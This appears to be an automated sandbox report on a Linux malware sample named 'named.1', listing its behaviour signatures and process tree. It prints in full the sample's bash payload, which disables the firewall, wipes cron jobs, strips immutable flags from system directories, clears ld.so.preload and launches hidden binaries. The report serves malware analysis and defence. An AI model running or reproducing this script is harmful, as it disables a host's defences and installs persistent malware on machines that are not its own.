cf7f60f766f1088de16ea59605c5abe8ff6f5c727c1aa34af946ba137eb486ad

Analysis

max time kernel
7s
max time network
112s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20230831-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20230831-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
11-10-2023 03:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

named.1
Size

18KB
MD5

edef2cc0c07ee7bb07bec2dbe73b13a0
SHA1

cd4a9987debc184e41d0f1944728c49fceafdd22
SHA256

3876cd0db7b1d79c9710091ab61d4711323f25ab14c80ca38456e74a1fe3df0d
SHA512

3e39b974c37ef8ded6465cc076d2244bb18261fa41c4607b1710c710652fd526a6f0e056d7cff3b65c62b06ca684052d0a26e16b15afc41bc7db77e816bd68a6
SSDEEP

384:/rMKen0Xvn/3PHfXvn/3PHfayqC6pNiAKGDirAV2tEIjvm:I90Xvn/3PHfXvn/3PHfayqC6p2V82nje

Score

9^/10

persistence rootkit

Malware Config

Signatures

Modifies the dynamic linker configuration file 1 TTPs 1 IoCs

Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

persistence

Hijack Execution Flow

T1574

description	ioc
File opened for modification	/etc/ld.so.preload

Flushes firewall rules 24 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

pid	Process
598	ufw
777	iptables
778	iptables
779	iptables
781	iptables
783	iptables
791	iptables
784	iptables
785	iptables
787	iptables
790	iptables
792	iptables
793	iptables
798	iptables
799	iptables
782	iptables
788	iptables
789	iptables
795	iptables
796	iptables
780	iptables
786	iptables
794	iptables
797	iptables

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

ioc	pid	Process
/lib/modules/4.15.0-161-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	602	modprobe

Attempts to change immutable files 17 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
808	chattr
813	chattr
814	chattr
817	chattr
800	chattr
806	chattr
807	chattr
812	chattr
815	chattr
803	chattr
805	chattr
811	chattr
801	chattr
809	chattr
810	chattr
802	chattr
804	chattr

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 2 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep

Writes file to system bin folder 1 TTPs 1 IoCs

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/bin/.lock	bash

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/2/status	pgrep
File opened for reading	/proc/28/status	pgrep
File opened for reading	/proc/98/status	pgrep
File opened for reading	/proc/603/status	pgrep
File opened for reading	/proc/85/cmdline	pgrep
File opened for reading	/proc/192/status	pgrep
File opened for reading	/proc/346/status	pgrep
File opened for reading	/proc/354/status	pgrep
File opened for reading	/proc/sys/kernel/modprobe	ip6tables
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/9/status	pgrep
File opened for reading	/proc/20/status	pgrep
File opened for reading	/proc/12/status	pgrep
File opened for reading	/proc/162/status	pgrep
File opened for reading	/proc/160/status	pgrep
File opened for reading	/proc/164/status	pgrep
File opened for reading	/proc/164/cmdline	pgrep
File opened for reading	/proc/170/status	pgrep
File opened for reading	/proc/6/status	pgrep
File opened for reading	/proc/9/cmdline	pgrep
File opened for reading	/proc/18/cmdline	pgrep
File opened for reading	/proc/158/status	pgrep
File opened for reading	/proc/154/status	pgrep
File opened for reading	/proc/593/cmdline	pgrep
File opened for reading	/proc/830/cmdline	pgrep
File opened for reading	/proc/1/status	pgrep
File opened for reading	/proc/14/status	pgrep
File opened for reading	/proc/26/cmdline	pgrep
File opened for reading	/proc/115/cmdline	pgrep
File opened for reading	/proc/35/cmdline	pgrep
File opened for reading	/proc/83/cmdline	pgrep
File opened for reading	/proc/3/status	pgrep
File opened for reading	/proc/7/cmdline	pgrep
File opened for reading	/proc/17/status	pgrep
File opened for reading	/proc/31/cmdline	pgrep
File opened for reading	/proc/358/status	pgrep
File opened for reading	/proc/10/status	pgrep
File opened for reading	/proc/19/cmdline	pgrep
File opened for reading	/proc/169/cmdline	pgrep
File opened for reading	/proc/291/status	pgrep
File opened for reading	/proc/421/cmdline	pgrep
File opened for reading	/proc/829/cmdline	pgrep
File opened for reading	/proc/5/status	pgrep
File opened for reading	/proc/7/status	pgrep
File opened for reading	/proc/23/cmdline	pgrep
File opened for reading	/proc/31/status	pgrep
File opened for reading	/proc/594/status	pgrep
File opened for reading	/proc/22/status	pgrep
File opened for reading	/proc/169/status	pgrep
File opened for reading	/proc/356/status	pgrep
File opened for reading	/proc/592/cmdline	pgrep
File opened for reading	/proc/251/cmdline	pgrep
File opened for reading	/proc/364/status	pgrep
File opened for reading	/proc/421/status	pgrep
File opened for reading	/proc/4/cmdline	pgrep
File opened for reading	/proc/8/cmdline	pgrep
File opened for reading	/proc/16/status	pgrep
File opened for reading	/proc/128/status	pgrep
File opened for reading	/proc/23/status	pgrep
File opened for reading	/proc/80/cmdline	pgrep
File opened for reading	/proc/380/status	pgrep
File opened for reading	/proc/358/cmdline	pgrep
File opened for reading	/proc/371/cmdline	pgrep
File opened for reading	/proc/415/cmdline	pgrep

/tmp/named.1
/tmp/named.1
1⤵
PID:596

/bin/bash
/tmp/named.1 -c "exec '/tmp/named.1' \"\$@\"" /tmp/named.1
1⤵
PID:596

/tmp/named.1
/tmp/named.1
1⤵
PID:596

/bin/bash
/tmp/named.1 -c " #!/bin/bash crontab -r 2>/dev/null ufw disable 2>/dev/null iptables -P INPUT ACCEPT 2>/dev/null iptables -P OUTPUT ACCEPT 2>/dev/null iptables -P FORWARD ACCEPT 2>/dev/null iptables -F 2>/dev/null iptables -A INPUT -s 103.195.5.59 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 5.180.182.251 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 93.115.19.72 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 103.252.116.137 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 86.105.252.3 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 93.114.128.169 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 93.115.22.143 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 86.107.197.97 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 86.106.181.76 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 103.252.116.128 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 113.30.189.231 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 138.68.113.5 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 68.183.241.53 -j DROP >/dev/null 2>&1 iptables -A INPUT -s 141.95.72.59 -j ACCEPT >/dev/null 2>&1 iptables -A INPUT -s 141.95.72.60 -j ACCEPT >/dev/null 2>&1 iptables -A INPUT -s 141.95.72.61 -j ACCEPT >/dev/null 2>&1 iptables -A INPUT -s 80.94.92.241 -j ACCEPT >/dev/null 2>&1 iptables -A INPUT -s 101.36.124.236 -j ACCEPT >/dev/null 2>&1 iptables -A INPUT -s 93.95.229.152 -j ACCEPT >/dev/null 2>&1 iptables -A INPUT -s 93.95.227.73 -j ACCEPT >/dev/null 2>&1 iptables -A INPUT -s 103.252.119.227 -j ACCEPT >/dev/null 2>&1 iptables -A INPUT -s 45.126.126.141 -j ACCEPT >/dev/null 2>&1 chattr -i /usr/sbin/ >/dev/null 2>&1 chattr -i /usr/bin/ >/dev/null 2>&1 chattr -i /bin/ >/dev/null 2>&1 chattr -i /usr/lib >/dev/null 2>&1 chattr -i /usr/lib64 >/dev/null 2>&1 chattr -i /usr/libexec >/dev/null 2>&1 chattr -i /etc/ >/dev/null 2>&1 chattr -i /tmp/ >/dev/null 2>&1 chattr -i /sbin/ chattr -i /etc/resolv.conf chattr -i /etc/cron.d/systeml >/dev/null 2>&1 chattr -i /etc/cron.weekly/systeml >/dev/null 2>&1 chattr -i /etc/cron.hourly/systeml >/dev/null 2>&1 chattr -i /etc/cron.daily/systeml >/dev/null 2>&1 chattr -i /etc/cron.monthly/systeml >/dev/null 2>&1 chattr -ia /etc/ld.so.preload 2>/dev/null cat /dev/null > /etc/ld.so.preload 2>/dev/null BACK=\"/bin/nameds\" SERVICE=\"ntools\" NEO=\"/usr/bin/neo\" EXEC=\"ntools\" DIR=\"/tmp\" chattr -iaus /etc/cron.*/\$COPY /etc/init.d/\$COPY 2>/dev/null if P=\$(pgrep -F /bin/.locks) >> /dev/null; then echo \"Running\" && exit else echo \"Not running\" cp \$BACK \$DIR/\$EXEC 2>/dev/null cp \$NEO \$DIR/neo 2>/dev/null chmod +x \$DIR/\$EXEC 2>/dev/null chmod +x \$DIR/neo 2>/dev/null chmod +x /usr/bin/named 2>/dev/null chmod +x /tmp/ntools 2>/dev/null \$DIR/\$EXEC --tls >/dev/null 2>&1 rm -rf \$DIR/\"\$EXEC\" fi sleep 2 echo \" \" >> /bin/.lock if P1=\$(pgrep ntools) >> /dev/null then echo \$P1 > /bin/.locks 2>/dev/null fi \$DIR/neo \$(cat /bin/.locks) >/dev/null 2>&1 " /tmp/named.1
1⤵
- Writes file to system bin folder
PID:596
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:597
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:598
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:599
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:600
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      Reads runtime system information
      PID:601
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:602
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:610
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:613
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:614
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:615
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:616
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:617
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:618
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:619
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:620
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:621
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      PID:622
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:623
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:624
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:625
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:626
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:627
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:628
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:629
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:630
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:631
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:632
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:633
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:634
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:635
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:636
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:637
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:638
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:639
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:640
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:641
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:642
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:643
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:644
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:645
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:646
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:647
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:648
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:649
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:650
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:651
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:652
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:653
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:654
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:655
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:656
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:657
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:658
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:659
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:660
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:661
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:662
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:663
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:664
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:665
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:666
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:667
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:668
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:669
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:670
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:671
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:672
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:673
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:674
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:675
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:676
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:677
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:678
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:679
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:680
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:681
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:682
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:683
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:684
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:685
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:686
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:687
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:688
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:689
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:690
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:691
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:692
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:693
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:694
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:695
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:696
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:697
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:698
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:699
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:700
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:701
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:702
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:703
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:704
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:705
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:706
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:707
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:708
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:709
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:710
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:711
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:712
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:713
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:714
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:715
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:716
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:717
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:718
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:719
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:720
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:721
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:722
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:723
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:724
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:725
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:726
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:727
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:728
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:729
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:730
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:731
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:732
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:733
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:734
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:735
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:736
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:737
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:738
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:739
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:740
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:741
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:742
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:743
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:744
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:745
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:746
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:747
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:748
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:749
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:750
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:751
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:752
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:753
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:754
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:755
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:756
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:757
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:758
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:759
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:760
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:761
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:762
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:763
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:764
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:765
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:766
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:767
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:768
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:769
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:770
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:771
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:772
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:773
- /sbin/iptables
  iptables -P INPUT ACCEPT
  2⤵
  PID:774
- /sbin/iptables
  iptables -P OUTPUT ACCEPT
  2⤵
  PID:775
- /sbin/iptables
  iptables -P FORWARD ACCEPT
  2⤵
  PID:776
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:777
- /sbin/iptables
  iptables -A INPUT -s 103.195.5.59 -j DROP
  2⤵
  - Flushes firewall rules
  PID:778
- /sbin/iptables
  iptables -A INPUT -s 5.180.182.251 -j DROP
  2⤵
  - Flushes firewall rules
  PID:779
- /sbin/iptables
  iptables -A INPUT -s 93.115.19.72 -j DROP
  2⤵
  - Flushes firewall rules
  PID:780
- /sbin/iptables
  iptables -A INPUT -s 103.252.116.137 -j DROP
  2⤵
  - Flushes firewall rules
  PID:781
- /sbin/iptables
  iptables -A INPUT -s 86.105.252.3 -j DROP
  2⤵
  - Flushes firewall rules
  PID:782
- /sbin/iptables
  iptables -A INPUT -s 93.114.128.169 -j DROP
  2⤵
  - Flushes firewall rules
  PID:783
- /sbin/iptables
  iptables -A INPUT -s 93.115.22.143 -j DROP
  2⤵
  - Flushes firewall rules
  PID:784
- /sbin/iptables
  iptables -A INPUT -s 86.107.197.97 -j DROP
  2⤵
  - Flushes firewall rules
  PID:785
- /sbin/iptables
  iptables -A INPUT -s 86.106.181.76 -j DROP
  2⤵
  - Flushes firewall rules
  PID:786
- /sbin/iptables
  iptables -A INPUT -s 103.252.116.128 -j DROP
  2⤵
  - Flushes firewall rules
  PID:787
- /sbin/iptables
  iptables -A INPUT -s 113.30.189.231 -j DROP
  2⤵
  - Flushes firewall rules
  PID:788
- /sbin/iptables
  iptables -A INPUT -s 138.68.113.5 -j DROP
  2⤵
  - Flushes firewall rules
  PID:789
- /sbin/iptables
  iptables -A INPUT -s 68.183.241.53 -j DROP
  2⤵
  - Flushes firewall rules
  PID:790
- /sbin/iptables
  iptables -A INPUT -s 141.95.72.59 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:791
- /sbin/iptables
  iptables -A INPUT -s 141.95.72.60 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:792
- /sbin/iptables
  iptables -A INPUT -s 141.95.72.61 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:793
- /sbin/iptables
  iptables -A INPUT -s 80.94.92.241 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:794
- /sbin/iptables
  iptables -A INPUT -s 101.36.124.236 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:795
- /sbin/iptables
  iptables -A INPUT -s 93.95.229.152 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:796
- /sbin/iptables
  iptables -A INPUT -s 93.95.227.73 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:797
- /sbin/iptables
  iptables -A INPUT -s 103.252.119.227 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:798
- /sbin/iptables
  iptables -A INPUT -s 45.126.126.141 -j ACCEPT
  2⤵
  - Flushes firewall rules
  PID:799
- /usr/bin/chattr
  chattr -i /usr/sbin/
  2⤵
  - Attempts to change immutable files
  PID:800
- /usr/bin/chattr
  chattr -i /usr/bin/
  2⤵
  - Attempts to change immutable files
  PID:801
- /usr/bin/chattr
  chattr -i /bin/
  2⤵
  - Attempts to change immutable files
  PID:802
- /usr/bin/chattr
  chattr -i /usr/lib
  2⤵
  - Attempts to change immutable files
  PID:803
- /usr/bin/chattr
  chattr -i /usr/lib64
  2⤵
  - Attempts to change immutable files
  PID:804
- /usr/bin/chattr
  chattr -i /usr/libexec
  2⤵
  - Attempts to change immutable files
  PID:805
- /usr/bin/chattr
  chattr -i /etc/
  2⤵
  - Attempts to change immutable files
  PID:806
- /usr/bin/chattr
  chattr -i /tmp/
  2⤵
  - Attempts to change immutable files
  PID:807
- /usr/bin/chattr
  chattr -i /sbin/
  2⤵
  - Attempts to change immutable files
  PID:808
- /usr/bin/chattr
  chattr -i /etc/resolv.conf
  2⤵
  - Attempts to change immutable files
  PID:809
- /usr/bin/chattr
  chattr -i /etc/cron.d/systeml
  2⤵
  - Attempts to change immutable files
  PID:810
- /usr/bin/chattr
  chattr -i /etc/cron.weekly/systeml
  2⤵
  - Attempts to change immutable files
  PID:811
- /usr/bin/chattr
  chattr -i /etc/cron.hourly/systeml
  2⤵
  - Attempts to change immutable files
  PID:812
- /usr/bin/chattr
  chattr -i /etc/cron.daily/systeml
  2⤵
  - Attempts to change immutable files
  PID:813
- /usr/bin/chattr
  chattr -i /etc/cron.monthly/systeml
  2⤵
  - Attempts to change immutable files
  PID:814
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:815
- /bin/cat
  cat /dev/null
  2⤵
  PID:816
- /usr/bin/chattr
  chattr -iaus /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.monthly/ /etc/cron.weekly/ /etc/init.d/
  2⤵
  - Attempts to change immutable files
  PID:817
- /bin/cp
  cp /bin/nameds /tmp/ntools
  2⤵
  PID:820
- /bin/cp
  cp /usr/bin/neo /tmp/neo
  2⤵
  - Reads runtime system information
  PID:821
- /bin/chmod
  chmod +x /tmp/ntools
  2⤵
  PID:822
- /bin/chmod
  chmod +x /tmp/neo
  2⤵
  PID:823
- /bin/chmod
  chmod +x /usr/bin/named
  2⤵
  PID:824
- /bin/chmod
  chmod +x /tmp/ntools
  2⤵
  PID:825
- /tmp/ntools
  /tmp/ntools --tls
  2⤵
  PID:826
- /bin/rm
  rm -rf /tmp/ntools
  2⤵
  PID:827
- /bin/sleep
  sleep 2
  2⤵
  PID:828
- /tmp/neo
  /tmp/neo
  2⤵
  PID:833

/usr/bin/pgrep
pgrep -F /bin/.locks
